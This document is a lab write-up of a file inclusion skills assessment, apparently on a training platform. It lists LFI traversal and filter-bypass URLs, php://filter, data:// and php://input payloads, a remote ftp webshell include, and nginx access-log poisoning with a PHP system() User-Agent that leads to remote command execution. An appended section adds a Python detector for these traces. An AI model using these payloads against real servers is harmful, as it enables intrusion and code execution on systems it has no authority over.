Skills Assessment - File Inclusion

April 23, 2024

It is an nginx web server

So this is where we might find an LFI that leads to RCE

http://83.136.255.150:58892/index.php?page=about

First we tried to find an LFI with the Jhaddix wordlist, but it returned nothing

  • First ffuf = Jhaddix.txt

ffuf -u http://83.136.255.150:58892/index.php?page=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 4521,4322

Nothing

  • Second ffuf - directory list medium

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.253.251:40368/FUZZ.php

Nothing

  • Third ffuf - LFI Linux

ffuf -u http://83.136.253.251:40368/index.php?page=../../../../FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Wordlist-Linux -fs 4521

  • Fourth ffuf - default web root

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt -u http://94.237.54.170:31057/index.php?page=../../../../FUZZ/index.php -fs 4521

Still nothing

http://94.237.57.59:39554/index.php?page=./contact/../../../../../../../etc/passwd

http://94.237.57.59:39554/index.php?page=contact/../../../../../../../etc/passwd

http://94.237.56.188:58604/index.php?page=./about/....//....//....//....//etc/passwd

http://83.136.254.223:54825/index.php?page=industries//....//....//....//....//....//....//etc/passwd

http://83.136.254.223:54825/index.php?page=industries//..../\..../\..../\..../\..../\..../\etc/passwd

http://83.136.254.223:54825/index.php?page=..../\..../\..../\..../\..../\..../\etc/passwd

http://83.136.254.223:54825/index.php?page=about/....\/....\/....\/....\/....\/....\/etc/passwd

http://83.136.254.223:54825/index.php?page=....\/....\/....\/....\/....\/....\/etc/passwd


http://83.136.254.223:54825/index.php?page=about//..../////....////////....////////....//////....///////....////////etc/passwd

http://94.237.57.59:39554/index.php?page=./contact/../../../../../../../etc/passwd%00.php

http://94.237.56.188:58604/index.php?page=..///////..////..//////etc/passwd

http://83.136.255.150:58892/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

http://83.136.255.150:58892/index.php?page=....//....//....//....//etc/passwd

http://94.237.57.59:39554/index.php?page=contact/../../../../../../../etc/passwd%00.php

http://94.237.57.59:39554/index.php?page=../../../../../var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=page=....//....//....//....//....//var/log/nginx/access.log

http://94.237.54.170:31057/index.php?page=/var/log/nginx/access.log%00

http://94.237.57.59:39554/index.php?page=page=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fvar%2Flog%2Fnginx%2Faccess.log

Still nothing

http://83.136.255.150:35577/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.3/fpm/php.ini

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=./about/....//....//....//....//etc/php/7.3/fpm/php.ini

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=.%2Fabout%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fphp%2F7.3%2Ffpm%2Fphp.ini

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=/var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=contact/....//....//....//....//....//var/log/nginx/access.log

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=....//....//....//....//....//var/log/nginx/access.log

/index.php?page=php://filter/read=convert.base64-encode/resource=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%68%70%2f%37%2e%33%2f%66%70%6d%2f%70%68%70%2e%69%6e%69

Still nothing

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../../../../etc/passwd

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about/../../../../../../../../etc/passwd

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

http://94.237.57.59:39554/index.php?page=php://filter/read=convert.base64-encode/resource=about%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00

This is the returned result: it says "Invalid input detected" when I'm including a ../../../ attack

PHP Session

This doesn't return anything

http://94.237.57.59:39554/index.php?page=page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

http://94.237.57.59:39554/index.php?page=ftp://10.10.14.166/cmd-webshell.php&cmd=id

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' 'http://94.237.56.188:58604/index.php?page=php://input&cmd=id'

HERE IS THE ANSWER


http://83.136.253.251:55954/index.php?page=php://filter/read=convert.base64-encode/resource=index

Then just decode it using an online site

http://94.237.62.149:30835/ilf_admin/index.php?log=system.log
http://94.237.62.149:30835/ilf_admin/index.php?log=../../../../../../etc/passwd
http://94.237.62.149:43967/ilf_admin/index.php?log=../../../../../../../etc/nginx/nginx.conf
http://94.237.62.149:30835/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log

First we have to create a payload that will poison the log

With this code we can execute RCE

curl -s 'http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log' -A '<?php system($_GET["cmd"]); ?>'

Then we will just use our browser to use some commands like id

http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id

Just view the files in the root directory - cd /; ls

http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=cd%20/;%20ls

Just cat the flag - 'cat /flag_dacc60f2348d.txt'

http://94.237.58.148:42207/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=cat%20/flag_dacc60f2348d.txt
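From the defender's side, every step in these notes leaves a trace in the nginx access log: the traversal strings (including the `....//` and encoded forms), the `php://` and `data://` wrapper URLs, and the PHP open tag planted in the User-Agent for log poisoning. The following is an added example, not part of the original notes, that scans access-log lines for those indicators; the log lines, IPs and paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in nginx "combined" format; the IPs, paths and
# User-Agents are made up for this example, not copied from a real target.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Apr/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Apr/2024:10:00:02 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 512 "-" "curl/8.4.0"
10.0.0.9 - - [23/Apr/2024:10:00:03 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 9000 "-" "curl/8.4.0"
10.0.0.9 - - [23/Apr/2024:10:00:04 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1" 200 300 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [23/Apr/2024:10:00:05 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 403 31 "-" "curl/8.4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r'\.\.[\\/]')                            # also hits ....// and ..../\ variants
WRAPPER = re.compile(r'\b(php|data|ftp|phar|expect)://', re.I)  # PHP stream wrappers in the page parameter
PHP_TAG = re.compile(r'<\?(php\b|=)', re.I)                      # PHP open tag inside a logged header

def fully_decode(value, rounds=3):
    """Percent-decode until stable so double encoding (%252e) is caught as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (ip, decoded target, [indicator names]) or None if the line is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = fully_decode(m['target'])
    findings = []
    if TRAVERSAL.search(target):
        findings.append('path_traversal')
    if WRAPPER.search(target):
        findings.append('php_wrapper')
    if '\x00' in target:
        findings.append('null_byte')
    # A PHP tag in a client-controlled header is the precursor of log poisoning.
    if PHP_TAG.search(m['ua']) or PHP_TAG.search(m['referer']):
        findings.append('php_tag_in_header')
    return (m['ip'], target, findings) if findings else None

def scan_log(text):
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]

if __name__ == '__main__':
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ', '.join(findings), target, sep='  ')
```

The `php_tag_in_header` hit is the one to alert on first: once it is written to a log that the vulnerable `log=` parameter can include, the next request with `&cmd=` is code execution.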
